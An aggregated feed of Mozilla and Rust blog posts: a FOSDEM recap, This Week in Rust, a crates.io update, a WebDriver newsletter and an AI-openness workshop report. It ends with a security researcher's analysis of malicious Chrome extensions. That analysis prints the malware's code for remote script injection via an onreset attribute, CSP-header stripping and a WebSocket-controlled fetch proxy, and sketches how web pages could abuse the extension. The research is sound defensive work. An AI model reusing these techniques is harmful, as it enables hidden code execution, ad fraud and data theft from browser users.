  • Then in the second half of Sunday, we hosted the Mozilla devroom, where we covered a wide range of Mozilla’s latest innovations, from mythbusting to Mozilla’s AI innovations and Firefox developments. Recordings will be available soon on FOSDEM’s website and via our YouTube channel. So stay tuned!

We’re grateful for the enthusiasm, conversations, and curiosity of attendees at FOSDEM 2025. And big thanks to our amazing volunteers and Mozillians for co-hosting our booth and the Mozilla devroom this year.

We sure had a blast, and we can’t wait to see you again next year!

This Week In Rust: This Week in Rust 585

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is ratzilla, a library for building terminal-themed web applications with Rust and WebAssembly.

Thanks to Orhun Parmaksız for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

425 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week, with the performance of primary benchmarks showing no change overall.

Triage done by @rylev. Revision range: f7538506..01e4f19c

Summary:

(instructions:u)             mean    range             count
Regressions ❌ (primary)      0.3%   [0.2%, 0.6%]      32
Regressions ❌ (secondary)    0.5%   [0.1%, 1.1%]      65
Improvements ✅ (primary)    -0.5%   [-1.0%, -0.2%]    17
Improvements ✅ (secondary)  -3.1%   [-10.3%, -0.2%]   20
All ❌✅ (primary)            0.0%   [-1.0%, 0.6%]     49

5 Regressions, 2 Improvements, 5 Mixed; 6 of them in rollups. 49 artifact comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust
Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-05 - 2025-03-05 🦀

Virtual
Africa
Asia
Europe
North America
South America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

If your rust code compiles and you don't use "unsafe", that is a pretty good certification.

Richard Gould about Rust certifications on rust-users

Thanks to ZiCog for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language Blog: crates.io: development update

Back in July 2024, we published a blog post about the ongoing development of crates.io. Since then, we have made a lot of progress and shipped a few new features. In this blog post, we want to give you an update on the latest changes that we have made to crates.io.

Crate deletions

In RFC #3660 we proposed a new feature that allows crate owners to delete their crates from crates.io under certain conditions. This can be useful if you have published a crate by mistake or if you want to remove a crate that is no longer maintained. After the RFC was accepted by all team members at the end of August, we began implementing the feature.

We created a new API endpoint DELETE /api/v1/crates/:name that allows crate owners to delete their crates and then created the corresponding user interface. If you are the owner of a crate, you can now go to the crate page, open the "Settings" tab, and find the "Delete this crate" button at the bottom. Clicking this button will lead you to a confirmation page telling you about the potential impact of the deletion and requirements that need to be met in order to delete the crate:

Delete Page Screenshot

As you can see from the screenshot above, a crate can only be deleted if either:

  • the crate has been published for less than 72 hours, or
  • the crate only has a single owner, and the crate has been downloaded less than 500 times for each month it has been published, and the crate is not depended upon by any other crate on crates.io.

These requirements were put in place to prevent abuse of the deletion feature and to ensure that crates that are widely used by the community are not deleted accidentally. If you have any feedback on this feature, please let us know!
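For those who prefer the API over the UI, here is a hedged sketch of calling the new endpoint directly with the reqwest crate. The authentication details are an assumption on our part (we mirror how cargo sends its API token), so check the endpoint's documentation before relying on this:

use reqwest::blocking::Client;

fn main() -> Result<(), Box<dyn std::error::Error>> {
    // Assumption: a regular crates.io API token, sent as the raw
    // Authorization header value, the way cargo does for publishes.
    let token = std::env::var("CRATES_IO_TOKEN")?;
    let resp = Client::new()
        .delete("https://crates.io/api/v1/crates/my-crate") // hypothetical crate name
        .header("Authorization", token)
        // crates.io asks API clients to identify themselves.
        .header("User-Agent", "crate-deletion-example (you@example.com)")
        .send()?;
    println!("HTTP {}", resp.status());
    Ok(())
}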

OpenAPI description

Around the holiday season we started experimenting with generating an OpenAPI description for the crates.io API. This was a long-standing request from the community, and we are happy to announce that we now have an experimental OpenAPI description available at https://crates.io/api/openapi.json!

Please note that this is still considered work-in-progress: for example, the stability guarantees for the endpoints are not written down yet, and the response schemas are not fully documented either.

You can view the OpenAPI description in e.g. a Swagger UI at https://petstore.swagger.io/ by putting https://crates.io/api/openapi.json in the top input field. We decided to not ship a viewer ourselves for now due to security concerns with running it on the same domain as crates.io itself. We may reconsider whether to offer it on a dedicated subdomain in the future if there is enough interest.

Swagger UI Screenshot

The OpenAPI description is generated by the utoipa crate, which is a tool that can be integrated with the axum web framework to automatically generate OpenAPI descriptions for all of your endpoints. We would like to thank Juha Kukkonen for his great work on this tool!

Support form and "Report Crate" button

Since the crates.io team is small and mostly consists of volunteers, we do not have the capacity to manually monitor all publishes. Instead, we rely on you, the Rust community, to help us catch malicious crates and users. To make it easier for you to report suspicious crates, we added a "Report Crate" button to all the crate pages. If you come across a crate that you think is malicious or violates the code of conduct or our usage policy, you can now click the "Report Crate" button and fill out the form that appears. This will send an email to the crates.io team, who will then review the crate and take appropriate action if necessary. Thank you to crates.io team member @eth3lbert who worked on the majority of this.

If you have any issues with the support form or the "Report Crate" button, please let us know. You can also always email us directly at help@crates.io if you prefer not to use the form.

Publish notifications

We have added a new feature that allows you to receive email notifications when a new version of your crate is published. This can be useful in detecting unauthorized publishes of your crate or simply to keep track of publishes from other members of your team.

Publish Notification Screenshot

This feature was another long-standing feature request from our community, and we were happy to finally implement it. If you'd prefer not to receive publish notifications, then you can go to your account settings on crates.io and disable these notifications.

Miscellaneous

These were some of the more visible changes to crates.io over the past couple of months, but a lot has happened "under the hood" as well.

  • RFC #3691 was opened and accepted to implement "Trusted Publishing" support on crates.io, similar to other ecosystems that adopted it. This will allow you to specify on crates.io which repository/system is allowed to publish new releases of your crate, allowing you to publish crates from CI systems without having to deal with API tokens anymore.

  • Slightly related to the above: API tokens created on crates.io now expire after 90 days by default. It is still possible to disable the expiry or choose other expiry durations though.

  • The crates.io team was one of the first projects to use the diesel database access library, but since that only supported synchronous execution it was sometimes a little awkward to use in our codebase, which was increasingly moving into an async direction after our migration to axum a while ago. The maintainer of diesel, Georg Semmler, did a lot of work to make it possible to use diesel in an async way, resulting in the diesel-async library. Over the past couple of months we incrementally ported crates.io over to diesel-async queries, which now allows us to take advantage of the internal query pipelining in diesel-async that resulted in some of our API endpoints getting a 10-15% performance boost. Thank you, Georg, for your work on these crates!

  • Whenever you publish a new version or yank/unyank existing versions a couple of things need to be updated. Our internal database is immediately updated, and then we synchronize the sparse and git index in background worker jobs. Previously, yanking and unyanking a high number of versions would each queue up another synchronization background job. We have now implemented automatic deduplication of redundant background jobs, making our background worker a bit more efficient.

  • The final big, internal change that was just merged last week is related to the testing of our frontend code. In the past we used a tool called Mirage to implement a mock version of our API, which allowed us to run our frontend test suite without having to spin up a full backend server. Unfortunately, the maintenance situation around Mirage had lately forced us to look into alternatives, and we are happy to report that we have now fully migrated to the "Industry standard API mocking" package msw. If you want to know more, you can find the details in the "small" migration pull request.

Feedback

We hope you enjoyed this update on the development of crates.io. If you have any feedback or questions, please let us know on Zulip or GitHub. We are always happy to hear from you and are looking forward to your feedback!

Firefox Developer Experience: Firefox WebDriver Newsletter 135

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 135 release cycle.

Contributions

Firefox is an open source project, and we are always happy to receive external code contributions to our WebDriver implementation. We want to give special thanks to everyone who filed issues, bugs and submitted patches.

In Firefox 135, several contributors managed to land fixes and improvements in our codebase:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi. Join our chatroom if you need any help to get started!

General

Improved user interactions simulation

To make user events more realistic and better simulate real user interactions in the browser, we have moved the action sequence processing of the Perform Actions commands in both Marionette and WebDriver BiDi from the content process to the parent process. While events are still sent synchronously from the content process, they are now triggered asynchronously via IPC calls originating from the parent process.

Due to this significant change, you might experience some regressions. If you encounter any issues, please file a bug for the Remote Agent. If the regressions block test execution, you can temporarily revert to the previous behavior by setting the Firefox preference remote.events.async.enabled to false.

With the processing of actions now handled in the parent process, the following issues were fixed as well:

WebDriver BiDi

New: format argument for browsingContext.captureScreenshot

Thanks to Liam’s work, the browsingContext.captureScreenshot command now supports the format argument. It allows clients to specify different file formats ("image/png" and "image/jpeg" are currently supported) and define the compression quality for screenshots.

The argument should follow the browsingContext.ImageFormat type, with a "type" property which is expected to be a string, and an optional "quality" property which can be a float between 0 and 1.

-> {
  "method": "browsingContext.captureScreenshot",
  "params": {
    "context": "6b1cd006-96f0-4f24-9c40-a96a0cf71e22",
    "origin": "document",
    "format": {
      "type": "image/jpeg",
      "quality": 0.1
    }
  },
  "id": 3
}

<- {
  "type": "success",
  "id": 3,
  "result": {
    "data": "iVBORw0KGgoAAAANSUhEUgAA[...]8AbxR064eNvgIAAAAASUVORK5CYII="
  }
}

Bug Fixes

Mozilla Privacy Blog: Navigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop

In December 2024, in the lead up to the AI Action Summit, Mozilla, Fondation Abeona, École Normale Supérieure (ENS) and the Columbia Institute of Global Politics gathered at ENS in Paris, bringing together a diverse group of AI experts, academics, civil society, regulators and business leaders to discuss a topic increasingly central to the future of AI: what does openness mean, and how can it enable trustworthy, innovative, and equitable outcomes?

The workshop followed the Columbia Convenings on Openness and AI, which Mozilla held in partnership with Columbia University’s Institute of Global Politics. These gatherings, held over the course of 2024 in New York and San Francisco, have brought together over 40 experts to address what “openness” should mean in the AI era.

Over the past two years, Mozilla has mounted a significant effort to promote and defend the role of openness in AI. Mozilla launched Mozilla.ai, an initiative focused on ethical, open-source AI tools, and supported small-scale, localized AI projects through its Builders accelerator program. Beyond technical investments, Mozilla has also been a vocal advocate for openness in AI policy, urging governments to adopt regulatory frameworks that foster competition and accountability while addressing risks. Through these initiatives, Mozilla is shaping a future where AI development aligns with public interest values.

This Paris Openness workshop discussion — part of the official ‘Road to the Paris AI Summit’ taking place in February 2025 — looked to bring together the European AI community and form actionable recommendations for policymakers. While it embraced healthy debate and disagreement around issues such as definitions of openness in AI, there was nevertheless broad agreement on the urgency of crafting collective ideas to advance openness while navigating an increasingly complex commercial, political and regulatory landscape.

The stakes could not be higher. As AI continues to shape our societies, economies, and governance systems, openness emerges as both an opportunity and a challenge. On one hand, open approaches can expand access to AI tools, foster innovation, and enhance transparency and accountability. On the other hand, they raise complex questions about safety and misuse. In Europe, these questions intersect with transformative regulatory frameworks like the EU AI Act, which seeks to ensure that AI systems are both safe and aligned with fundamental rights.

As in software development, the goal of being ‘open’ in AI is a crucial one. At its heart, we were reminded in the discussion, openness is a holistic outlook. For AI in particular it is a pathway to a more pluralistic tool – one that can be more transparent, contextual, participatory and culturally appropriate. Each of these goals, however, contains natural tensions.

A central question of this most recent dialogue challenged participants on the best ways to build with safety in mind while also embracing openness. The day was broken down into two workshops that examined these questions from a technical and policy standpoint.

Running through both of the workshops was the thread of a persistent challenge: the multifaceted nature of the term openness. In the policy context, the term “open-source” can be too narrow, and at times, it risks being seen as an ideological stance rather than a pragmatic tool for addressing specific issues. To address this, many participants felt openness should be framed as a set of components — including open models, data, and tools — each of which has specific benefits and risks.

Examining Technical Perspectives on Openness and Safety

A significant concern for many in the open-source community is getting access to the best existing safety tools. Despite the increasing importance of AI safety, many researchers find it difficult or expensive to access tools that help identify and address AI risks. In particular, the discussion surfaced an increasing tension: some researchers and startups have found it difficult to access datasets of known CSAM (Child Sexual Abuse Material) hashes. Access to these datasets could help mitigate misuse or clean training datasets. The workshop called for broader sharing of safety tools and more support for those working at the cutting edge of AI development.

More widely, some participants were frustrated by the perception that open source AI development is unconcerned with questions of safety. They pointed out that, especially when it comes to regulation, engaging seriously with safety makes open approaches even more competitive.

Discussing Policy Implications of Openness in AI

Policy discussions during the workshop focused on the economic, societal, and regulatory dimensions of openness in AI. These ranged over several themes, including:

  1. Challenging perceptions of openness: There is a clear need to change the narrative around openness, especially in policymaking circles. The open-source community must both act as a community and present itself as knowledgeable and solution-oriented, demonstrating how openness can be a means to advancing the public interest — not an abstract ideal. As one participant pointed out, openness should be viewed as a tool for societal benefit, not as an end in itself.
  2. Tensions between regulation and innovation are misleading: As one of the first regulatory frameworks on AI to be drafted, the EU’s AI Act is viewed by many as a test bed for getting to smarter AI regulation. While regulation is widely characterised as obstructing innovation, some participants highlighted that this can be misleading — many new entrants seek out jurisdictions with favourable regulatory and competition policies that level the playing field.
  3. A changing U.S. Perspective: In the United States, the open-source AI agenda has gained significant traction, particularly in the wake of incidents like the Llama leaks, which showed that many of the feared risks associated with openness did not materialize. Significantly, the U.S. National Telecommunications and Information Administration emphasized the benefits of open source AI technology and introduced a nuanced view of safety concerns around open-weight AI models.

Many participants also agreed that policymakers, many of whom are not deeply immersed in the technicalities of AI, need a clearer framework for understanding the value of openness. Considering the focus of the upcoming Paris AI Summit, some participants felt one solution could lie in focusing on public interest AI. This concept resonates more directly with broader societal goals while still acknowledging the risks and challenges that openness brings.

Recommendations 

Embracing openness in AI is non-negotiable if we are to build trust and safety; it fosters transparency, accountability, and inclusive collaboration. Openness must extend beyond software to broader access to the full AI stack, including data and infrastructure, with governance that safeguards the public interest and prevents monopolization.

It is clear that the open source community must make its voice louder. If AI is to advance competition, innovation, language, research, culture and creativity for the global majority of people, then an evidence-based approach to the benefits of openness, particularly when it comes to proven economic benefits, is essential for driving this agenda forward.

Several recommendations for policymakers also emerged.

  1. Diversify AI Development: Policymakers should seek to diversify the AI ecosystem, ensuring that it is not dominated by a few large corporations in order to foster more equitable access to AI technologies and reduce monopolistic control. This should be approached holistically, looking at everything from procurement to compute strategies.
  2. Support Infrastructure and Data Accessibility: There is an urgent need to invest in AI infrastructure, including access to data and compute power, in a way that does not exacerbate existing inequalities. Policymakers should prioritize distribution of resources to ensure that smaller actors, especially those outside major tech hubs, are not locked out of AI development.
  3. Understand openness as central to achieving AI that serves the public interest: One of the official tracks of the upcoming Paris AI Action Summit is Public Interest AI. Increasingly, openness should be deployed as a main route to AI that truly serves the public interest.
  4. Openness should be an explicit EU policy goal: With one of the furthest-along AI regulatory frameworks, the EU will continue to be a testbed for many of the big questions in AI policy. The EU should adopt an explicit focus on promoting openness in AI as a policy goal.

We will be raising all the issues discussed while at the AI Action Summit in Paris. The organizers hope to host another set of these discussions following the conclusion of the Summit in order to continue working with the community and to better inform governments and other stakeholders around the world.

The list of participants at the Paris Openness Workshop is below:

  • Linda Griffin – VP of Global Policy, Mozilla
  • Udbhav Tiwari – Director, Global Product Policy, Mozilla
  • Camille François – Researcher, Columbia University
  • Tanya Perelmuter – Co-founder and Director of Strategy, Fondation Abeona
  • Yann Lechelle – CEO, Probabl
  • Yann Guthmann – Head of the Digital Economy Department at the French Competition Authority
  • Adrien Basdevant – Tech lawyer, Entropy Law
  • Andrzej Neugebauer – AI Program Director, LINAGORA
  • Thierry Poibeau – Director of Research, CNRS, ENS
  • Nik Marda – Technical Lead for AI Governance, Mozilla
  • Andrew Strait – Associate Director, Ada Lovelace Institute (UK)
  • Paul Keller – Director of Policy, Open Future (Netherlands)
  • Guillermo Hernandez – AI Policy Analyst, OECD
  • Sandrine Elmi Hersi – Unit Chief of “Open Internet”, ARCEP

The post Navigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop appeared first on Open Policy & Advocacy.

Wladimir Palant: Analysis of an advanced malicious Chrome extension

Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn’t possible to analyze their functionality in detail.

However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.

Update (2025-02-04): An update to the Download Manager Integration Checklist extension was released a day before I published this article, clearly prompted by my asking adindex about this. The update removes the malicious functionality and clears extension storage. Luckily, I’ve saved both the previous version and its storage contents.

[Screenshot of the extension’s pop-up. The text in the pop-up says “Seamlessly integrate the renowned Internet Download Manager (IDM) with Google Chrome, all without the need for dubious third-party extensions,” followed by some instructions.]

The problematic extensions

Since my previous article I found a bunch more extensions with malicious functionality that is almost identical to Download Manager Integration Checklist. The extension Auto Resolution Quality for YouTube™ does not seem to be malicious (yet?) but shares many remarkable oddities with the other extensions.

Name                                      Weekly active users   Extension ID                       Featured
Freemybrowser                             10,000                bibmocmlcdhadgblaekimealfcnafgfn
AutoHD for Twitch™                        195                   didbenpmfaidkhohcliedfmgbepkakam
Free simple Adult Blocker with password   1,000                 fgfoepffhjiinifbddlalpiamnfkdnim
Convert PDF to JPEG/PNG                   20,000                fkbmahbmakfabmbbjepgldgodbphahgc
Download Manager Integration Checklist    70,000                ghkcpcihdonjljjddkmjccibagkjohpi
Auto Resolution Quality for YouTube™      223                   hdangknebhddccoocjodjkbgbbedeaam
Adblock.mx - Adblock for Chrome           1,000                 hmaeodbfmgikoddffcfoedogkkiifhfe
Auto Quality for YouTube™                 100,000               iaddfgegjgjelgkanamleadckkpnjpjc
Anti phising safer browsing for chrome    7,000                 jkokgpghakemlglpcdajghjjgliaamgc
Darktheme for google translate            40,000                nmcamjpjiefpjagnjmkedchjkmedadhc

Additional IOCs:

  • adblock[.]mx
  • adultblocker[.]org
  • autohd[.]org
  • autoresolutionquality[.]com
  • browserguard[.]net
  • freemybrowser[.]com
  • freepdfconversion[.]com
  • internetdownloadmanager[.]top
  • megaxt[.]com
  • darkmode[.]site

“Remote configuration” functionality

The Download Manager Integration Checklist extension was an odd one on the list in my previous article. It has very minimal functionality: it’s merely supposed to display a set of instructions. This is a task that doesn’t require any permissions at all, yet the extension requests access to all websites and the declarativeNetRequest permission. Apparently, nobody noticed this inconsistency so far.

Looking at the extension code, there is another oddity. The checklist displayed by the extension is downloaded from Firebase, Google’s online database. Yet there is also a download from https://help.internetdownloadmanager.top/checklist, with the response being handled by this function:

async function u(l) {
  await chrome.storage.local.set({ checklist: l });

  await chrome.declarativeNetRequest.updateDynamicRules({
    addRules: l.list.add,
    removeRuleIds: l.list.rm,
  });
}

This is what I flagged as malicious functionality initially: part of the response is used to add declarativeNetRequest rules dynamically. At first I missed something however: the rest of the data being stored as checklist is also part of the malicious functionality, allowing execution of remote code:

function f() {
  let doc = document.documentElement;
  function updateHelpInfo(info, k) {
    doc.setAttribute(k, info);
    doc.dispatchEvent(new CustomEvent(k.substring(2)));
    doc.removeAttribute(k);
  }

  document.addEventListener(
    "description",
    async ({ detail }) => {
      const response = await chrome.runtime.sendMessage(
        detail.msg,
      );
      document.dispatchEvent(
        new CustomEvent(detail.responseEvent, {
          detail: response,
        }),
      );
    },
  );

  chrome.storage.local.get("checklist").then(
    ({ checklist }) => {
      if (checklist && checklist.info && checklist.core) {
        updateHelpInfo(checklist.info, checklist.core);
      }
    },
  );
}

There is a tabs.onUpdated listener hidden within the legitimate webextension-polyfill module that will run this function for every web page via tabs.executeScript API.

This function looks fairly unsuspicious. Understanding its functionality is easier if you know that checklist.core is "onreset". So it takes the document element, fills its onreset attribute with some JavaScript code from checklist.info, triggers the reset event and removes the attribute again. That’s how this extension runs some server-provided code in the context of every website.
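For illustration, here is the same trick reduced to its core, outside of any extension code. Nothing here is specific to the extension; this is plain DOM behavior:

// 1. Write the payload into an inline event handler attribute.
document.documentElement.setAttribute(
  "onreset",
  "console.log('payload runs in page context')"
);

// 2. Dispatching a matching event compiles and runs the inline handler.
document.documentElement.dispatchEvent(new CustomEvent("reset"));

// 3. Remove the attribute again so nothing suspicious remains in the DOM.
document.documentElement.removeAttribute("onreset");

A strict Content Security Policy would normally block such inline handlers, which is exactly why the extension strips CSP headers first, as shown in the next section.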

The code being executed

When the extension downloads its “checklist” immediately after installation the server response will be empty. Sort of: “nothing to see here, this is merely some dead code somebody forgot to remove.” The server sets a cookie however, allowing it to recognize the user on subsequent downloads. And only after two weeks or so will it respond with the real thing. For example, the list key of the response then looks like this:

"add": [
  {
    "action": {
      "responseHeaders": [
        {
          "header": "Content-Security-Policy-Report-Only",
          "operation": "remove"
        },
        {
          "header": "Content-Security-Policy",
          "operation": "remove"
        }
      ],
      "type": "modifyHeaders"
    },
    "condition": {
      "resourceTypes": [
        "main_frame"
      ],
      "urlFilter": "*"
    },
    "id": 98765432,
    "priority": 1
  }
],
"rm": [
  98765432
]

No surprise here, this is about removing Content Security Policy protection from all websites, making sure it doesn’t interfere when the extension injects its code into web pages.

As I already mentioned, the core key of the response is "onreset", an essential component towards executing the JavaScript code. And the JavaScript code in the info key is heavily obfuscated by JavaScript Obfuscator, with most strings and property names encrypted to make reverse engineering harder.

Of course this kind of obfuscation can still be reversed, and you can see the entire deobfuscated code here. Note that most function and variable names have been chosen randomly, the original names being meaningless. The code consists of three parts:

  1. Marshalling of various extension APIs: tabs, storage, declarativeNetRequest. This uses DOM events to communicate with the function f() mentioned above, this function forwards the messages to the extension’s background worker and the worker then calls the respective APIs.

    In principle, this allows reading out your entire browser state: how many tabs, what pages are loaded etc. Getting notified on changes is possible as well. The code doesn’t currently use this functionality, but the server can of course produce a different version of it any time, for all users or only for selected targets.

    There is also another aspect here: in order to run remote code, this code has been moved into the website realm. This means however that any website can abuse these APIs as well. It’s only a matter of knowing which DOM events to send. Yes, this is a massive security issue (a sketch of what a malicious page could do follows after this list).

  2. Code downloading a 256 KiB binary blob from https://st.internetdownloadmanager.top/bff and storing it in encoded form as bff key in the extension storage. No, this isn’t your best friend forever but a Bloom filter. This filter is applied to SHA-256 hashes of domain names and determines on which domain names the main functionality should be activated (a rough sketch of such a check also follows after this list).

    With Bloom filters, it is impossible to determine which exact data went into it. It is possible however to try out guesses, to see which one it accepts. Here is the list of matching domains that I could find. This list looked random to me initially, and I even suspected that noise has been added to it in order to hide the real target domains. Later however I could identify it as the list of adindex advertisers, see below.

  3. The main functionality: when active, it sends the full address of the current page to https://st.internetdownloadmanager.top/cwc2 and might get a “session” identifier back. It is likely that this server stores the addresses it receives and sells the resulting browsing history. This part of the functionality stays hidden however.

    The “session” handling is visible on the other hand. There is some rate limiting here, making sure that this functionality is triggered at most once per minute and no more than once every 12 hours for each domain. If activated, a message is sent back to the extension’s background worker telling it to connect to wss://pa.internetdownloadmanager.top/s/<session>. All further processing happens there.
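To make two of the points above more tangible, here are two hedged sketches. First, the API marshalling issue: because the bridge lives in the page realm and listens for ordinary DOM events, any web page could talk to it. The "description" event name comes from the deobfuscated code above, but the message format expected by the background worker is unknown to me, so the payload here is purely a placeholder:

// What any page could do while the vulnerable extension is installed.
// "description" is the event name from the deobfuscated bridge code;
// the shape of `msg` is an assumption, the real schema is undocumented.
document.addEventListener("stolen-response", (event) => {
  console.log("extension API result:", event.detail);
});
document.dispatchEvent(
  new CustomEvent("description", {
    detail: {
      msg: { /* some extension API request understood by the worker */ },
      responseEvent: "stolen-response",
    },
  })
);

Second, the Bloom filter check. The real filter's parameters (number of probes, how bit positions are derived from the SHA-256 digest) are unknown, so everything below is illustrative rather than a reconstruction:

// Illustrative Bloom filter membership test over a domain name.
// filterBits is assumed to be a Uint8Array; a 256 KiB filter holds
// 2,097,152 bits. The number of probes is a guess.
async function domainMatches(domain, filterBits, numProbes = 8) {
  const digest = new Uint8Array(
    await crypto.subtle.digest("SHA-256", new TextEncoder().encode(domain))
  );
  const totalBits = filterBits.length * 8;
  for (let i = 0; i < numProbes; i++) {
    // Derive one candidate bit position per probe from two digest bytes.
    const pos = ((digest[2 * i] << 8) | digest[2 * i + 1]) % totalBits;
    if (!(filterBits[pos >> 3] & (1 << (pos & 7)))) {
      return false; // an unset bit: the domain is definitely not included
    }
  }
  return true; // all probed bits set: probably included (false positives possible)
}

This asymmetry is what makes the guessing attack described above possible: the filter never reveals its contents, but anyone holding it can cheaply test candidate domains.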

The “session” handling

Here we are back in the extension’s static code, no longer remotely downloaded code. The entry point for the “session” handling is function __create. Its purpose has been concealed, with some essential property and method names contained in the obfuscated code above or received from the web socket connection. I filled in these parts and simplified the code to make it easier to understand:

var __create = url => {
  const socket = new this.WebSocket(url);
  const buffer = {};
  socket.onmessage = event => {
    let message = event.data.arrayBuffer ? event.data : JSON.parse(event.data);
    this.stepModifiedMatcher(socket, buffer, message)
  };
};

stepModifiedMatcher =
  async (socket, buffer, message) => {
    if (message.arrayBuffer)
      buffer[1] = message.arrayBuffer();
    else {
      let [url, options] = message;
      if (buffer[1]) {
        options.body = await buffer[1];
        buffer[1] = null;
      }

      let response = await this.fetch(url, options);
      let data = await Promise.all([
        !message[3] ? response.arrayBuffer() : false,
        JSON.stringify([...response.headers.entries()]),
        response.status,
        response.url,
        response.redirected,
      ]);
      for (const entry of data) {
        if (socket.readyState === 1) {
          socket.send(entry);
        }
      }
    }
  };

This receives instructions from the web socket connection on what requests to make. Upon success the extension sends information like response text, HTTP headers and HTTP status back to the server.

What is this good for? Before I could observe this code in action I was left guessing. Is this an elaborate approach to de-anonymize users? On some websites their name will be right there in the server response. Or is this about session hijacking? There would be session cookies in the headers and CSRF tokens in the response body, so the extension could be instrumented to perform whatever actions necessary on behalf of the attackers – like initiating a money transfer once the user logs into their PayPal account.

The reality turned out to be far more mundane. When I finally managed to trigger this functionality on the Ashley Madison website, I saw the extension perform lots of web requests. Apparently, it was replaying a browsing session that was recorded two days earlier with the Firefox browser. The entry point of this session: https://api.sslcertifications.org/v1/redirect?advertiserId=11EE385A29E861E389DA14DDA9D518B0&adspaceId=11EE4BCA2BF782C589DA14DDA9D518B0&customId=505 (redirecting to ashleymadison.com).

[Developer Tools screenshot listing a number of network requests. It starts with ashleymadison.com and loads a number of JavaScript and CSS files as well as images. All requests are listed as fetch requests initiated by background.js:361.]

The server handling api.sslcertifications.org belongs to the German advertising company adindex. Their list of advertisers is mostly identical to the list of domains matched by the Bloom filter the extension uses. So this is ad fraud: the extension generates fake link clicks, making sure its owner earns money for “advertising” websites like Ashley Madison. It uses the user’s IP address and replays recorded sessions to make this look like legitimate traffic, hoping to avoid detection this way.

I contacted adindex and they confirmed that sslcertifications.org is a domain registered by a specific publisher but handled by adindex. They also said that they confronted the publisher in question with my findings and, having found their response unsatisfactory, blocked this publisher. Shortly afterwards the internetdownloadmanager.top domain became unreachable, and the api.sslcertifications.org site no longer has a valid SSL certificate. Domains related to other extensions, the ones I didn’t mention in my request, are still accessible.

Who is behind these extensions?

The adindex CEO declined to provide the identity of the problematic publisher. There are obvious data protection reasons for that. However, as I looked further I realized that he might have additional reasons to withhold this information.

While most extensions I list provide clearly fake names and addresses, the Auto Quality for YouTube™ extension is associated with the MegaXT website. That website doesn’t merely feature a portfolio of two browser extensions (the second one being an older Manifest V2 extension, also geared towards running remote code); it also names a real owner with a real name. Who just happens to be a developer at adindex.

There is also the company eokoko GmbH, developing Auto Resolution Quality for YouTube™ extension. This extension appears to be non-malicious at the moment, yet it shares a number of traits with the malicious extensions on my list. Director of this company is once again the same adindex developer.

And not just any developer. According to his website he used to be CTO at adindex in 2013 (I couldn’t find an independent confirmation for this). He also founded a company together with the adindex CEO in 2018, something that is confirmed by public records.

When I mentioned this connection in my communication with adindex CEO the response was:

[He] works for us as a freelancer in development. Employees (including freelancers) are generally not allowed to operate publisher accounts at adindex and the account in question does not belong to [this developer]. Whether he operates extensions is actually beyond my knowledge.

I want to conclude this article with some assorted history facts:

  • The two extensions associated with MegaXT have been running remote code since at least 2021. I don’t know whether they were outright malicious from the start; this would be impossible to prove retroactively even with source code, given that they simply loaded some JavaScript code into the extension context. But both extensions have reviews complaining about malicious functionality going back to 2022.
